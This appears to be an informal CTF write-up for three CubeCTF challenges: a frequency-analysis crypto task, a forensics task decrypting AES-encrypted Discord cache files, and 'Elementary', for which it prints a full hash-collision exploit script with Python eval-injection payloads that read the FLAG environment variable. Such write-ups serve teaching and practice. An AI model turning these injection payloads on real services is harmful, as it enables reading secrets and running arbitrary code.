index

Introduction

so i kinda forgot what this ctf was all about. anyways here are a few writeups i dug up.

Crypto

Incantation

While walking through a meadow, you find a magical book on the ground. The letters seem to be dancing off the page, dancing to a rhythm of a song you used to know, but you can’t quite make them out.

nc incantation.chal.cubectf.com 5757

Author: @B00TK1D

it was a binary that kinda gives you random characters replacing them in a flag.

lowk mad lazy rn but basically the logic made it so that the characters of the flag will appear more often in each respective index, just querying a lot of times and doing a frequency analysis give syou the flag

Elementary

I made a calculator for elementary students. I made sure it can only do basic operations, so it should be safe. nc elementary.chal.cubectf.com 3456 Author: @B00TK1D

from the given source, we see that the script is giving us eval(). this lets us execute arbitrary code, but it verifies that what we are trying to do is actually a valid calculator expression (or plausible, using a regex) before letting us execute it
the key vulnerability is that it actually hashes all operations we give it, and if the hash of the operation we give has been previously verified, it ignores verification and directly runs it

Here is the solution outline

Find a hash collision, where a valid calculator expression and a payload to read the flag from the environ FLAG have the same hash (note that the hash algo only uses 6 bytes, so brute-force is feasible)
Submit the valid expression first to have the shared hash marked as “safe”
Submit the payload. Since it has the same hash, it will be run and give us the flag from environ FLAG.

1
#!/usr/bin/env python3
2
from pwn import *
3
import random
4
import multiprocessing
5
import time
6
import string
7

8

9
# The hash function from the challenge
10
def h(data: str) -> bytes:
11
    b = data.encode("utf-8")
12

13
    h1 = 0x1234567890AB
14
    h2 = 0xFEDCBA098765
15

16
    for i in range(len(b)):
17
        byte = b[i]
18
        shift = (i % 6) * 6
19

20
        if i % 2 == 0:
21
            h1 ^= byte << shift
22
            h1 = (h1 * 0x100000001B3) & 0xFFFFFFFFFFFF
23
        else:
24
            h2 ^= byte << shift
25
            h2 = (h2 * 0xC6A4A7935BD1) & 0xFFFFFFFFFFFF
26

27
    result = h1 ^ ((h2 << 24) | (h2 >> 24))
28
    result = (result ^ (result >> 25)) * 0xFF51AFD7ED55
29
    result &= 0xFFFFFFFFFFFFFFFF
30
    result = (result ^ (result >> 25)) * 0xC4CEB9FE1A85
31
    result &= 0xFFFFFFFFFFFFFFFF
32
    result ^= result >> 25
33

34
    return result.to_bytes(8, "big")[:6]
35

36

37
def generate_valid_string():
38
    """Generate a random string that passes validation"""
39
    allowed_chars = "0123456789+-*/. "
40
    length = random.randint(1, 10)  # Vary the length
41
    return "".join(random.choice(allowed_chars) for _ in range(length))
42

43

44
def generate_payloads(count=1000):
45
    """Generate many unique payload variations"""
46
    base_payloads = [
47
        "__import__('os').environ['FLAG']",
48
        "__import__('os').getenv('FLAG')",
49
        "__import__('os').environ.get('FLAG')",
50
        "getattr(__import__('os'),'environ')['FLAG']",
51
    ]
52

53
    payloads = []
54

55
    # Generate random comment content
56
    def random_comment():
57
        length = random.randint(0, 20)
58
        return "".join(
59
            random.choice(string.ascii_letters + string.digits) for _ in range(length)
60
        )
61

62
    # Generate a random number of spaces
63
    def random_spaces():
64
        return " " * random.randint(0, 5)
65

66
    # Create variations with spaces and comments
67
    for _ in range(count):
68
        base = random.choice(base_payloads)
69

70
        # Decide what kind of variation to make
71
        variation_type = random.randint(1, 3)
72

73
        if variation_type == 1:  # Spaces after
74
            payload = base + random_spaces()
75
        elif variation_type == 2:  # Comment after
76
            payload = base + "#" + random_comment()
77
        elif variation_type == 3:
78
            payload = base + random_spaces() + "#" + random_comment()
79
        else:
80
            payload = base
81

82
        payloads.append(payload)
83

84
    # Make sure we have unique payloads
85
    unique_payloads = list(set(payloads))
86
    print(f"[*] Generated {len(unique_payloads)} unique payloads from {count} attempts")
87

88
    return unique_payloads
89

90

91
def worker(proc_id, valid_hashes, payload_hashes, result_queue, stop_event):
92
    """Worker process to find hash collision using birthday attack"""
93
    count = 0
94
    start_time = time.time()
95
    batch_size = 10000
96

97
    print(
98
        f"[*] Process {proc_id}: Started with {len(payload_hashes)} payload variations"
99
    )
100

101
    while not stop_event.is_set():
102
        # Generate a batch of valid strings
103
        valid_strings = [generate_valid_string() for _ in range(batch_size)]
104
        count += batch_size
105

106
        for valid_str in valid_strings:
107
            if stop_event.is_set():
108
                break
109

110
            valid_hash = h(valid_str)
111
            hex_hash = valid_hash.hex()
112

113
            # Check if this valid string collides with any payload
114
            if hex_hash in payload_hashes:
115
                payload = payload_hashes[hex_hash]
116
                print(f"[+] Process {proc_id}: Found collision!")
117
                print(f"VALID STRING IS {valid_str}")
118
                print(f"PAYLOAD IS {payload}")
119
                result_queue.put((valid_str, payload))
120
                stop_event.set()
121
                break
122

123
            # Store this valid string's hash
124
            valid_hashes[hex_hash] = valid_str
125

126
        # Report progress
127
        if count % 100000 == 0:
128
            elapsed = time.time() - start_time
129
            rate = count / elapsed if elapsed > 0 else 0
130
            print(
131
                f"[*] Process {proc_id}: {count} strings checked, {rate:.2f}/sec, {len(valid_hashes)} unique"
132
            )
133

134

135
def main():
136
    manager = multiprocessing.Manager()
137
    valid_hashes = manager.dict()
138
    payload_hashes = manager.dict()
139
    result_queue = multiprocessing.Queue()
140
    stop_event = multiprocessing.Event()
141

142
    # Generate many payload variations and their hashes
143
    payloads = generate_payloads(count=20_000_000)
144

145
    for payload in payloads:
146
        payload_hash = h(payload).hex()
147
        payload_hashes[payload_hash] = payload
148

149
    print(f"[*] Generated {len(payload_hashes)} unique payload hashes")
150

151
    # Start worker processes
152
    num_processes = 8  # Use all cores
153
    processes = []
154
    for i in range(num_processes):
155
        p = multiprocessing.Process(
156
            target=worker,
157
            args=(i, valid_hashes, payload_hashes, result_queue, stop_event),
158
        )
159
        p.start()
160
        processes.append(p)
161

162
    # Wait for result
163
    while not stop_event.is_set():
164
        if not result_queue.empty():
165
            valid_str, payload = result_queue.get()
166
            stop_event.set()
167

168
            print(f"[+] Found collision!")
169
            print(f"[+] Valid string: '{valid_str}'")
170
            print(f"[+] Payload: '{payload}'")
171
            print(f"[+] Hash: {h(valid_str).hex()}")
172

173
        time.sleep(0.1)
174

175
    # Cleanup
176
    for p in processes:
177
        p.terminate()
178
        p.join()
179

180

181
if __name__ == "__main__":
182
    main()

after running for a while we can see:

1
[+] Process 7: Found collision!
2
VALID STRING IS *+5592
3
PAYLOAD IS getattr(__import__('os'),'environ')['FLAG']#iFIw66TjP

then submitting those two in that order gives us the flag: cube{3l3m3nt4ry_mY_d34r_w47s0n_181c2f60}

Forensics

Discord

I got a really awesome picture from my friend on Discord, but then he deleted it! I asked someone for a program that could get those pictures back, but when I ran it, all it did was close Discord! Send help, I need that picture back! Authors: @poke_player and @ajmeese7

upon download and decompress the disk image we get an AD1 file. so we gotta use FTK imager. i am a mac/linux user so i had to boot up my windows vm.

FTK imager loads the AD1 easily, we can browse the user’s folders/files.

immediately i go to check the discord cache. surprisingly, by looking at my own system, images are actually stored in the cache (ask ChatGPT for details since it can probably explain better)

but in the image, all files there are .enc

in his download folder we find a suspicious .exe. taking it out of the VM and doing a little bit of rev (upx unpack), we find that it is a PyInstaller binary.

using some nice tools we can extract the python script and decompile the .pyc

it does some sort of aes encryption that we need to reverse, it’s pretty trivial to do so:

1
from pathlib import Path
2
from Cryptodome.Cipher import AES
3
from Cryptodome.Protocol.KDF import PBKDF2
4
from Cryptodome.Util.Padding import unpad
5

6
# Parameters
7
user_id = b"1334198101459861555" # gotten from his files
8
salt = b'BBBBBBBBBBBBBBBB'
9
iv = b'BBBBBBBBBBBBBBBB'
10
enc_dir = Path("/Users/colin/Public/Cache_Data")
11

12
# Derive AES key
13
key = PBKDF2(user_id, salt, dkLen=32, count=1_000_000)
14

15
# Process all .enc files
16
for file in enc_dir.glob("*.enc"):
17
    with open(file, "rb") as f:
18
        ciphertext = f.read()
19
    try:
20
        cipher = AES.new(key, AES.MODE_CBC, iv)
21
        decrypted = unpad(cipher.decrypt(ciphertext), 16)
22
        out_file = file.with_suffix(".bin")
23
        with open(out_file, "wb") as f:
24
            f.write(decrypted)
25
        print(f"[+] Decrypted {file.name} -> {out_file.name}")
26
    except Exception as e:
27
        print(f"[!] Failed: {file.name} - {e}")

this gives us a load of images, one of them has the flag